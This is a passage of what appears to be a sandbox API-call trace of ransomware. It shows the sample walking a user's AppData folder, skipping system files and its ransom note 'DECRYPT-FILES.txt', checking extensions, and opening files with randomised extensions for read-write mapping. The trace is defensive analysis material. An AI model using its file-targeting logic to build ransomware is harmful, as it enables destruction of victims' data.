lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=34137) returned 1 [0184.644] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.644] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.645] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.645] CloseHandle (hObject=0x268) returned 1 [0184.645] CloseHandle (hObject=0x264) returned 1 [0184.645] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.645] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99c4bc30, ftCreationTime.dwHighDateTime=0x1d4ccf8, ftLastAccessTime.dwLowDateTime=0x1bafa770, ftLastAccessTime.dwHighDateTime=0x1d4cb6c, ftLastWriteTime.dwLowDateTime=0xad570d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RVu8ePGXop9R2.mp3.bfWPTNS", cAlternateFileName="RVU8EP~1.BFW")) returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="DECRYPT-FILES.txt") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="autorun.inf") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="boot.ini") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="desktop.ini") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="ntuser.dat") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="iconcache.db") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="bootsect.bak") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="ntuser.dat.log") returned 1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="thumbs.db") returned -1 [0184.645] lstrcmpiW (lpString1="RVu8ePGXop9R2.mp3.bfWPTNS", lpString2="Bootfont.bin") returned 1 [0184.645] lstrlenW (lpString="RVu8ePGXop9R2.mp3.bfWPTNS") returned 25 [0184.646] lstrcmpiW (lpString1="bfWPTNS", lpString2="lnk") returned -1 [0184.646] lstrcmpiW (lpString1="bfWPTNS", lpString2="exe") returned -1 [0184.646] lstrcmpiW (lpString1="bfWPTNS", lpString2="sys") returned -1 [0184.646] lstrcmpiW (lpString1="bfWPTNS", lpString2="dll") returned -1 [0184.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.646] lstrlenW (lpString="RVu8ePGXop9R2.mp3.bfWPTNS") returned 25 [0184.646] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.646] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="RVu8ePGXop9R2.mp3.bfWPTNS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3.bfWPTNS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3.bfWPTNS" [0184.646] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3.bfWPTNS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rvu8epgxop9r2.mp3.bfwptns"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.646] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=55200) returned 1 [0184.646] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.646] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.647] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.647] CloseHandle (hObject=0x268) returned 1 [0184.647] CloseHandle (hObject=0x264) returned 1 [0184.647] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.647] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6699d1f0, ftCreationTime.dwHighDateTime=0x1d4cebb, ftLastAccessTime.dwLowDateTime=0x1b380d60, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0xad596ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x999b, dwReserved0=0x0, dwReserved1=0x0, cFileName="uKAYm0ioy0dRtlDj-.jpg.mUgK", cAlternateFileName="UKAYM0~1.MUG")) returned 1 [0184.647] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="DECRYPT-FILES.txt") returned 1 [0184.647] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="autorun.inf") returned 1 [0184.647] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="boot.ini") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="desktop.ini") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="ntuser.dat") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="iconcache.db") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="bootsect.bak") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="ntuser.dat.log") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="thumbs.db") returned 1 [0184.648] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg.mUgK", lpString2="Bootfont.bin") returned 1 [0184.648] lstrlenW (lpString="uKAYm0ioy0dRtlDj-.jpg.mUgK") returned 26 [0184.648] lstrcmpiW (lpString1="mUgK", lpString2="lnk") returned 1 [0184.648] lstrcmpiW (lpString1="mUgK", lpString2="exe") returned 1 [0184.648] lstrcmpiW (lpString1="mUgK", lpString2="sys") returned -1 [0184.648] lstrcmpiW (lpString1="mUgK", lpString2="dll") returned 1 [0184.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.648] lstrlenW (lpString="uKAYm0ioy0dRtlDj-.jpg.mUgK") returned 26 [0184.648] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.648] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="uKAYm0ioy0dRtlDj-.jpg.mUgK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg.mUgK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg.mUgK" [0184.648] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg.mUgK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukaym0ioy0drtldj-.jpg.mugk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.650] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=39323) returned 1 [0184.650] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.650] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.651] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.651] CloseHandle (hObject=0x268) returned 1 [0184.651] CloseHandle (hObject=0x264) returned 1 [0184.651] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.651] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3a42d0, ftCreationTime.dwHighDateTime=0x1d4d32f, ftLastAccessTime.dwLowDateTime=0xf6d460, ftLastAccessTime.dwHighDateTime=0x1d4cc3b, ftLastWriteTime.dwLowDateTime=0xad5e3160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="uM20gJ1uzhQ3_i.pps.DY67", cAlternateFileName="UM20GJ~1.DY6")) returned 1 [0184.651] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="DECRYPT-FILES.txt") returned 1 [0184.651] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="autorun.inf") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="boot.ini") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="desktop.ini") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="ntuser.dat") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="iconcache.db") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="bootsect.bak") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="ntuser.dat.log") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="thumbs.db") returned 1 [0184.652] lstrcmpiW (lpString1="uM20gJ1uzhQ3_i.pps.DY67", lpString2="Bootfont.bin") returned 1 [0184.652] lstrlenW (lpString="uM20gJ1uzhQ3_i.pps.DY67") returned 23 [0184.652] lstrcmpiW (lpString1="DY67", lpString2="lnk") returned -1 [0184.652] lstrcmpiW (lpString1="DY67", lpString2="exe") returned -1 [0184.652] lstrcmpiW (lpString1="DY67", lpString2="sys") returned -1 [0184.652] lstrcmpiW (lpString1="DY67", lpString2="dll") returned 1 [0184.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.652] lstrlenW (lpString="uM20gJ1uzhQ3_i.pps.DY67") returned 23 [0184.652] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.652] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="uM20gJ1uzhQ3_i.pps.DY67" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps.DY67") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps.DY67" [0184.652] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps.DY67" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\um20gj1uzhq3_i.pps.dy67"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.652] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=41452) returned 1 [0184.652] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.653] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.653] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.653] CloseHandle (hObject=0x268) returned 1 [0184.653] CloseHandle (hObject=0x264) returned 1 [0184.653] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.654] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x215db650, ftCreationTime.dwHighDateTime=0x1d4c714, ftLastAccessTime.dwLowDateTime=0x7f2a2700, ftLastAccessTime.dwHighDateTime=0x1d4d11e, ftLastWriteTime.dwLowDateTime=0xad62f420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x188c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v5RW.gif.GNKAmc", cAlternateFileName="V5RWGI~1.GNK")) returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="DECRYPT-FILES.txt") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="autorun.inf") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="boot.ini") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="desktop.ini") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="ntuser.dat") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="iconcache.db") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="bootsect.bak") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="ntuser.dat.log") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="thumbs.db") returned 1 [0184.654] lstrcmpiW (lpString1="v5RW.gif.GNKAmc", lpString2="Bootfont.bin") returned 1 [0184.654] lstrlenW (lpString="v5RW.gif.GNKAmc") returned 15 [0184.654] lstrcmpiW (lpString1="GNKAmc", lpString2="lnk") returned -1 [0184.654] lstrcmpiW (lpString1="GNKAmc", lpString2="exe") returned 1 [0184.654] lstrcmpiW (lpString1="GNKAmc", lpString2="sys") returned -1 [0184.654] lstrcmpiW (lpString1="GNKAmc", lpString2="dll") returned 1 [0184.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.654] lstrlenW (lpString="v5RW.gif.GNKAmc") returned 15 [0184.654] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.654] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="v5RW.gif.GNKAmc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif.GNKAmc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif.GNKAmc" [0184.654] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif.GNKAmc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v5rw.gif.gnkamc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.655] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=100544) returned 1 [0184.655] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.655] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.655] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.656] CloseHandle (hObject=0x268) returned 1 [0184.656] CloseHandle (hObject=0x264) returned 1 [0184.656] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.656] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x359d8d30, ftCreationTime.dwHighDateTime=0x1d4c56a, ftLastAccessTime.dwLowDateTime=0x9251a590, ftLastAccessTime.dwHighDateTime=0x1d4ceaf, ftLastWriteTime.dwLowDateTime=0xad655580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16d7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vt5loZ_qw3.wav.ck5Mhr", cAlternateFileName="VT5LOZ~1.CK5")) returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="DECRYPT-FILES.txt") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="autorun.inf") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="boot.ini") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="desktop.ini") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="ntuser.dat") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="iconcache.db") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="bootsect.bak") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="ntuser.dat.log") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="thumbs.db") returned 1 [0184.656] lstrcmpiW (lpString1="Vt5loZ_qw3.wav.ck5Mhr", lpString2="Bootfont.bin") returned 1 [0184.656] lstrlenW (lpString="Vt5loZ_qw3.wav.ck5Mhr") returned 21 [0184.656] lstrcmpiW (lpString1="ck5Mhr", lpString2="lnk") returned -1 [0184.656] lstrcmpiW (lpString1="ck5Mhr", lpString2="exe") returned -1 [0184.656] lstrcmpiW (lpString1="ck5Mhr", lpString2="sys") returned -1 [0184.656] lstrcmpiW (lpString1="ck5Mhr", lpString2="dll") returned -1 [0184.656] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.656] lstrlenW (lpString="Vt5loZ_qw3.wav.ck5Mhr") returned 21 [0184.656] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.656] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Vt5loZ_qw3.wav.ck5Mhr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav.ck5Mhr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav.ck5Mhr" [0184.656] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav.ck5Mhr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vt5loz_qw3.wav.ck5mhr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.657] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=93567) returned 1 [0184.657] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.657] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.658] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.658] CloseHandle (hObject=0x268) returned 1 [0184.658] CloseHandle (hObject=0x264) returned 1 [0184.658] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.658] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8785a0, ftCreationTime.dwHighDateTime=0x1d4cd27, ftLastAccessTime.dwLowDateTime=0x904a3840, ftLastAccessTime.dwHighDateTime=0x1d4c98a, ftLastWriteTime.dwLowDateTime=0xad6a1840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x239d, dwReserved0=0x0, dwReserved1=0x0, cFileName="wHEMr.bmp.bAK8IZU", cAlternateFileName="WHEMRB~1.BAK")) returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="DECRYPT-FILES.txt") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="autorun.inf") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="boot.ini") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="desktop.ini") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="ntuser.dat") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="iconcache.db") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="bootsect.bak") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="ntuser.dat.log") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="thumbs.db") returned 1 [0184.658] lstrcmpiW (lpString1="wHEMr.bmp.bAK8IZU", lpString2="Bootfont.bin") returned 1 [0184.658] lstrlenW (lpString="wHEMr.bmp.bAK8IZU") returned 17 [0184.658] lstrcmpiW (lpString1="bAK8IZU", lpString2="lnk") returned -1 [0184.658] lstrcmpiW (lpString1="bAK8IZU", lpString2="exe") returned -1 [0184.658] lstrcmpiW (lpString1="bAK8IZU", lpString2="sys") returned -1 [0184.658] lstrcmpiW (lpString1="bAK8IZU", lpString2="dll") returned -1 [0184.659] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.659] lstrlenW (lpString="wHEMr.bmp.bAK8IZU") returned 17 [0184.659] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.659] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="wHEMr.bmp.bAK8IZU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp.bAK8IZU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp.bAK8IZU" [0184.659] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp.bAK8IZU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\whemr.bmp.bak8izu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.659] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=9117) returned 1 [0184.659] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.659] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.660] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.660] CloseHandle (hObject=0x268) returned 1 [0184.660] CloseHandle (hObject=0x264) returned 1 [0184.660] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.660] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbaa540b0, ftCreationTime.dwHighDateTime=0x1d4cd10, ftLastAccessTime.dwLowDateTime=0x9fce6c00, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0xad6c79a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="XG1ODMqHamQ.gif.APnd25D", cAlternateFileName="XG1ODM~1.APN")) returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="DECRYPT-FILES.txt") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="autorun.inf") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="boot.ini") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="desktop.ini") returned 1 